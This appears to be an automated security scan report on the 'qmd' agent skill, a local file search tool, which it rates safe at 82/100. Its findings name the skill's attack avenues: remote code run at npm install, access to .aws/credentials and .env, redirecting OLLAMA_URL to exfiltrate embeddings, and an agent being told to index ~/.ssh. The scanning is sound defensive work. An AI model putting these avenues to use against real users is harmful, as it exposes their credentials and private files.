Is qmd safe?

https://clawhub.ai/steipete/qmd

82
SAFE

The qmd skill is a minimal documentation wrapper for a local file search/indexing CLI tool. It contains no prompt injection, hidden code, or malicious behavior. The primary risk is the npm install from a GitHub URL which delegates code execution trust to an external repository. Filesystem monitoring showed access to .aws/credentials and .env during install (likely OpenClaw runtime behavior), but zero network activity confirms no data exfiltration occurred.

Category Scores

Prompt Injection 90/100 · 30%
Data Exfiltration 78/100 · 25%
Code Execution 65/100 · 20%
Clone Behavior 72/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 75/100 · 5%

Findings (6)

MEDIUM NPM install from GitHub URL executes remote code -25

The skill metadata specifies installation via npm install https://github.com/tobi/qmd, which downloads and executes code from an external GitHub repository. Any preinstall/postinstall scripts in that package will run with the user's privileges. While the repository belongs to a well-known developer (Tobi Lutke), this is an inherent trust delegation.

MEDIUM Install process accessed .aws/credentials and .env -18

During installation, the process opened /home/oc-exec/.aws/credentials and /home/oc-exec/.env. While no outbound network activity was detected (suggesting no exfiltration occurred), accessing these sensitive files during a skill install is a notable concern. This appears to be the OpenClaw runtime's standard behavior rather than the skill itself.

LOW OLLAMA_URL could be redirected to external server -12

The skill references OLLAMA_URL for embeddings/rerank, defaulting to localhost:11434. If an attacker modified this environment variable, document embeddings could be sent to an external server, effectively exfiltrating document content in vector form.

LOW Arbitrary filesystem indexing capability -10

The qmd collection add /path command can index any filesystem path the user has read access to. An agent could be instructed to index sensitive directories like ~/.ssh or ~/Documents, making their contents searchable and retrievable via qmd commands.

INFO Jiti transpilation cache created in /tmp -5

The install process created transpiled CJS files in /tmp/jiti/. This is standard behavior for the OpenClaw runtime's module loading system and is not attributable to the skill itself.

INFO No outbound network connections during install 0

Despite accessing sensitive files, the monitoring detected zero outbound network connections and zero firewall blocks. This is a strong indicator that no data was exfiltrated during the install phase.